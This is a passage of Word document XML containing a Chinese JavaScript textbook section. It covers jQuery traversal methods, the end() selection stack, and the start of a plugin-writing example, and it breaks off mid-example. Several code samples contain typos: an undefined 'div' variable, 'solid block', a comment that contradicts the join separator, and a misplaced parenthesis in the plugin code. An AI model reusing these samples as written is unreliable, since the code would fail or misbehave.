      </w:r>
      <w:r>
        <w:t>元素的子节点元素中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>$("#header</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>span,#footer</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>span")</w:t>
      </w:r>
      <w:r>
        <w:t>相同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#header,#footer").children("span")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>contents()</w:t>
      </w:r>
      <w:r>
        <w:t>方法与</w:t>
      </w:r>
      <w:r>
        <w:t>children()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似，不同的是它会返回每一个元素的所有子节点，包括文本节点。</w:t>
      </w:r>
      <w:r>
        <w:t>如果选中元素集中有＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，</w:t>
      </w:r>
      <w:r>
        <w:t>contents()</w:t>
      </w:r>
      <w:r>
        <w:t>还会返回该＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞内容的文档对象。注意</w:t>
      </w:r>
      <w:r>
        <w:t>contents()</w:t>
      </w:r>
      <w:r>
        <w:t>不接受可选的选择器字符串参数</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>因为它返回的文档节点不完全是元素，而选择器字符串仅用来描述元素节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>next()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prev()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回每一个选中元素的下一个和上一个兄弟元素（如果有的话）。如果传入了选择器，会只选中匹配该选择器的兄弟元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").next("p")//</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>$("h1+p")</w:t>
      </w:r>
      <w:r>
        <w:t>相同</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").prev()//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素前面的兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>nextAll(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prevAll()</w:t>
      </w:r>
      <w:r>
        <w:t>返回每一个选中元素前面或后面的所有兄弟元素（如果有的话）。</w:t>
      </w:r>
      <w:r>
        <w:t>siblings()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则返回每一个选中元素的所有兄弟元素（选中元素本身不是自己的兄弟元素）。如果给这些方法传入选择器，则只会返回匹配的兄弟元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#footer").nextAll("p")//</w:t>
      </w:r>
      <w:r>
        <w:t>紧跟</w:t>
      </w:r>
      <w:r>
        <w:t>#footer</w:t>
      </w:r>
      <w:r>
        <w:t>元素的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#footer").prevAll()//#footer</w:t>
      </w:r>
      <w:r>
        <w:t>元素前面的所有兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">jQuery </w:t>
      </w:r>
      <w:r>
        <w:t>1.4</w:t>
      </w:r>
      <w:r>
        <w:t>开始，</w:t>
      </w:r>
      <w:r>
        <w:t>nextUntil()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prevUntil()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受一个选择器参数，会选取选中元素后面或前面的所有兄弟元素，直到找到某个匹配该选择器的兄弟元素为止。如果省略该选择器，这两个方法的作用就和不带选择器的</w:t>
      </w:r>
      <w:r>
        <w:t>nextAll()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>prevAll()</w:t>
      </w:r>
      <w:r>
        <w:t>一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回每一个选中元素的父节点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("li").parent()//</w:t>
      </w:r>
      <w:r>
        <w:t>列表元素的父节点，比如＜</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parents()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回每一个选中元素的祖先节点（向上直到＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）。</w:t>
      </w:r>
      <w:r>
        <w:t>parent()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>parents()</w:t>
      </w:r>
      <w:r>
        <w:t>都</w:t>
      </w:r>
      <w:r>
        <w:t>接受一个可选的选择器字符串参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a[href]").parents("p")//</w:t>
      </w:r>
      <w:r>
        <w:t>含有链接的＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parentsUntil()</w:t>
      </w:r>
      <w:r>
        <w:t>返回每一个选中元素的祖先元素，直到出现匹配指定选择器的第一个祖先元素。</w:t>
      </w:r>
      <w:r>
        <w:t>closest()</w:t>
      </w:r>
      <w:r>
        <w:t>方法必须传入一个选择器字符串，会返回每一个选中元素的祖先元素中匹配该选择器的最近一个祖先元素（如果有的话）。对该方法而言，元素被认为是自身的祖先元素。在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>中，还可以给</w:t>
      </w:r>
      <w:r>
        <w:t>closest()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个祖先元素作为第二个参数，用来阻止</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>往上查找时超越该指定元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a[href]").closest("div")//</w:t>
      </w:r>
      <w:r>
        <w:t>包含链接的最里层＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a[href]").parentsUntil(":not(div)")//</w:t>
      </w:r>
      <w:r>
        <w:t>所有包裹＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>恢复到之前的选中元素集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了实现方法的链式调用，很多</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法最后都会返回调用对象。然而本节讲述的方法都返回新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。可以链式调用下去，但必须清晰地意识到，在链式调用的后面所操作的元素集，可能已经不是该链式调用开始时的元素集了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际情况还要复杂些。当这里所描述的选取方法在创建或返</w:t>
      </w:r>
      <w:r>
        <w:t>回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象时，它们会给该对象添加一个到它派生自的旧</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的内部引用。这会创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的链式表或栈。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来弹出栈，返回保存的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在链式调用中调用</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>会将匹配元素集还原到之前的状态。考虑以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>寻找所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，然后在其中寻找＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>高亮显示＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，然后给＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素添加一个边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先，不使用链式调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var divs=$("div")</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var paras=div.find("p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>paras.addClass("highlight");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>divs.css("border","solid black 1px");//</w:t>
      </w:r>
      <w:r>
        <w:t>下面展现如何使用链式调用来实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").find("p").addClass("highlight").end().css("border","solid black 1px");//</w:t>
      </w:r>
      <w:r>
        <w:t>还可以将操作调换顺序来避免调用</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").css("border","solid block 1px").find("p").addClass("highlight</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想手动定义选中元素集，同时保持与</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的兼容，可以将新的元素集作为数组或类数组对象传递给</w:t>
      </w:r>
      <w:r>
        <w:t>pushStack()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。指定的元素会成为新的选中元素，之前选中的元素集则会压入栈中，之后可以用</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还原它们：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sel=$("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>选取所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sel.pushStack(document.getElementsByTagName("p"));//</w:t>
      </w:r>
      <w:r>
        <w:t>修改为所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sel.end();//</w:t>
      </w:r>
      <w:r>
        <w:t>还原为＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>既然我们已经讲解了</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法及其使用的选区栈，就有最后一个方法需要讲解。</w:t>
      </w:r>
      <w:r>
        <w:t>andSelf()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，包含当前的所有选中元素，加上之前的所有选中元素（会去除重复的）。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>andSelf()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样，或许</w:t>
      </w:r>
      <w:r>
        <w:t>"addPrev"</w:t>
      </w:r>
      <w:r>
        <w:t>是一个更具描述性的名字。作为例子，考虑上面代码的下述变化：高亮显示＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素及其父节点中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，然后给这些＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素添加边框：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").find("p").andSelf().//</w:t>
      </w:r>
      <w:r>
        <w:t>寻找＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞，合并起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>addClass("</w:t>
      </w:r>
      <w:r>
        <w:t>highlight").//</w:t>
      </w:r>
      <w:r>
        <w:t>都高亮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>end().end().//</w:t>
      </w:r>
      <w:r>
        <w:t>弹出栈两次，返回</w:t>
      </w:r>
      <w:r>
        <w:t>$("div")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>css("border","solid black 1px");//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>divs</w:t>
      </w:r>
      <w:r>
        <w:t>添加边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="19_9_jQueryDe_Cha_Jian_Kuo_Zhan_"/>
      <w:r>
        <w:t>19.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的插件扩展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的写法使得添加新功能很方便。添加新功能的模块称为插件（</w:t>
      </w:r>
      <w:r>
        <w:t>plug-in</w:t>
      </w:r>
      <w:r>
        <w:t>），可以在这里找到很多插件：</w:t>
      </w:r>
      <w:r>
        <w:t>http://plugins.jquery.com</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件是普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件，在网页中使用时，只需要用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素引入就好，就和引用任何其他</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>类库一样（注意，必须在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>之后引入插件）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开发</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件非常简单。关键点是要知道</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fn</w:t>
      </w:r>
      <w:r>
        <w:t>是所有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的原型对象。如果给该对象添加一个函数，该函数会成为一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法。例子如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.fn.println=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有参数合并成空格分隔的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg=Array.prototype.join.call(arguments,"");//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的每一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>this.each(function(){/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>将参数字符串作为纯文本添加到每一个元素后面，并添加一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(this).append(document.createTextNode(msg).append("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个未加修改的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，以便链式调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
